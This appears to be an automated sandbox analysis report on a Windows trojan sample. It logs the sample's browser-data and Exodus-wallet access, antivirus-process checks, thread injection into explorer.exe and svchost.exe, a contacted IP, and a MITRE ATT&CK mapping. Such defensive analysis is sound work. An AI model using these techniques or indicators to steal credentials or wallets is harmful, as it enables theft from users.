      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-conio-l1-1-0.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-convert-l1-1-0.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-environment-l1-1-0.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-filesystem-l1-1-0.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-math-l1-1-0.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-process-l1-1-0.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-stdio-l1-1-0.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-string-l1-1-0.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\_lzma.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp8AEF.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp8AEF.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\Desktop\DTBZGIOOSO VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\Desktop\MNULNCRIYC VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\Documents\DTBZGIOOSO VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\Documents\DVWHKMNFNN VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\Documents\IVHSHTCODI VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\Documents\MNULNCRIYC VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\Documents\My Pictures VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\Pictures\Camera Roll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\Pictures\Saved Pictures VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\Documents\My Videos VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\Documents\ONBQCLYSPU VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\Documents\TTCBKWZYOC VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\Pictures VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\Pictures\Camera Roll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\Pictures\Saved Pictures VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\Music VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\Videos VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\Downloads VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D39EE8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,GetTickCount64,QueryPerformanceCounter,0_2_00007FF795D39EE8
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D2CD90 malloc,GetUserNameA,free,malloc,free,GetComputerNameA,free,free,0_2_00007FF795D2CD90
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7B518C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,6_2_00007FF7CA7B518C
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D2D070 GetVersionExW,_snprintf,0_2_00007FF795D2D070
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: svchost.exeBinary or memory string: procmon.exe
      Source: svchost.exeBinary or memory string: avgui.exe
      Source: svchost.exeBinary or memory string: procexp.exe
      Source: svchost.exeBinary or memory string: avgwdsvc.exe
      Source: svchost.exeBinary or memory string: MsMpEng.exe
      Source: svchost.exeBinary or memory string: autoruns.exe

      Stealing of Sensitive Information

      barindex
      Yara detected MicroClip
      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: tmp1946.exe PID: 2300, type: MEMORYSTR
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\reportsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\StorageJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\FirefoxJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Code CacheJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnDataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Safe BrowsingJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Subresource FilterJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\SessionsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\WidevineCdmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\ChromeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\DawnCacheJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\BrowserMetricsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\RecoveryImprovedJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\GPUCacheJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SafetyTipsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\GraphiteDawnCacheJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SSLErrorAssistantJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\MEIPreloadJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\DefaultJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\databasesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\CrashpadJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\GCM StoreJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\ChromeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\hyphen-dataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\OptimizationHintsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\AutofillStatesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crowd DenyJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\CacheJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\ProfilesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\PKIMetadataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\WebStorageJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\pnaclJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ShaderCacheJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\coupon_dbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\NetworkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Sync DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\FileTypePoliciesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\GrShaderCacheJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\OriginTrialsJump to behavior
      Tries to steal Crypto Currency Wallets
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior

      Remote Access Functionality

      barindex
      Yara detected MicroClip
      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: tmp1946.exe PID: 2300, type: MEMORYSTR

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts14
      Native API      		11
      DLL Side-Loading      		11
      DLL Side-Loading      		1
      Deobfuscate/Decode Files or Information      		1
      OS Credential Dumping      		2
      System Time Discovery      		1
      Exploitation of Remote Services      		12
      Archive Collected Data      		1
      Data Obfuscation      		Exfiltration Over Other Network Medium1
      Data Encrypted for Impact
      CredentialsDomainsDefault Accounts1
      Exploitation for Client Execution      		1
      Registry Run Keys / Startup Folder      		1
      Access Token Manipulation      		2
      Obfuscated Files or Information      		1
      Credential API Hooking      		1
      Account Discovery      		Remote Desktop Protocol2
      Data from Local System      		12
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts2
      Command and Scripting Interpreter      		Logon Script (Windows)812
      Process Injection      		1
      Timestomp      		Security Account Manager3
      File and Directory Discovery      		SMB/Windows Admin Shares1
      Credential API Hooking      		2
      Encrypted Channel      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
      Registry Run Keys / Startup Folder      		11
      DLL Side-Loading      		NTDS35
      System Information Discovery      		Distributed Component Object ModelInput Capture2
      Non-Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Rootkit      		LSA Secrets461
      Security Software Discovery      		SSHKeylogging22
      Application Layer Protocol      		Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Masquerading      		Cached Domain Credentials121
      Virtualization/Sandbox Evasion      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items121
      Virtualization/Sandbox Evasion      		DCSync3
      Process Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      Access Token Manipulation      		Proc Filesystem1
      Application Window Discovery      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt812
      Process Injection      		/etc/passwd and /etc/shadow1
      System Owner/User Discovery      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
      Hidden Files and Directories      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1580849 Sample: 52kYJGCon6.exe Startdate: 26/12/2024 Architecture: WINDOWS Score: 100 55 Suricata IDS alerts for network traffic 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 Antivirus detection for URL or domain 2->59 61 7 other signatures 2->61 9 52kYJGCon6.exe 1 4 2->9         started        process3 file4 45 C:\Users\user\...\8D8EBC2422383023011859.exe, PE32+ 9->45 dropped 47 8D8EBC242238302301...exe:Zone.Identifier, ASCII 9->47 dropped 71 Found evasive API chain (may stop execution after checking mutex) 9->71 73 Found API chain indicative of debugger detection 9->73 75 Contains functionality to inject code into remote processes 9->75 77 5 other signatures 9->77 13 svchost.exe 19 9->13         started        signatures5 process6 dnsIp7 53 185.81.68.147, 49704, 49705, 49706 KLNOPT-ASFI Finland 13->53 49 C:\Users\user\AppData\Local\...\tmp8AEF.exe, PE32+ 13->49 dropped 51 C:\Users\user\AppData\Local\...\tmp1946.exe, PE32+ 13->51 dropped 93 Benign windows process drops PE files 13->93 95 Found evasive API chain (may stop execution after checking mutex) 13->95 97 Changes the view of files in windows explorer (hidden files and folders) 13->97 99 5 other signatures 13->99 18 explorer.exe 77 8 13->18 injected 21 tmp8AEF.exe 52 13->21         started        24 tmp1946.exe 46 13->24         started        file8 signatures9 process10 file11 63 Contains functionality to inject threads in other processes 18->63 26 8D8EBC2422383023011859.exe 4 18->26         started        29 8D8EBC2422383023011859.exe 4 18->29         started        37 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 21->37 dropped 39 C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32+ 21->39 dropped 41 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 21->41 dropped 43 47 other files (none is malicious) 21->43 dropped 65 Multi AV Scanner detection for dropped file 21->65 31 tmp8AEF.exe 21->31         started        67 Tries to harvest and steal browser information (history, passwords, etc) 24->67 69 Tries to steal Crypto Currency Wallets 24->69 signatures12 process13 signatures14 79 Multi AV Scanner detection for dropped file 26->79 81 Found evasive API chain (may stop execution after checking mutex) 26->81 83 Found API chain indicative of debugger detection 26->83 85 Found hidden mapped module (file has been removed from disk) 26->85 33 svchost.exe 26->33         started        87 Writes to foreign memory regions 29->87 89 Modifies the context of a thread in another process (thread injection) 29->89 91 Maps a DLL or memory area into another process 29->91 35 svchost.exe 29->35         started        process15

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      52kYJGCon6.exe66%ReversingLabsWin64.Trojan.Vigorf
      52kYJGCon6.exe46%VirustotalBrowse
      52kYJGCon6.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\_MEI3442\VCRUNTIME140.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\_bz2.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\_ctypes.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\_hashlib.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\_lzma.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\_socket.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
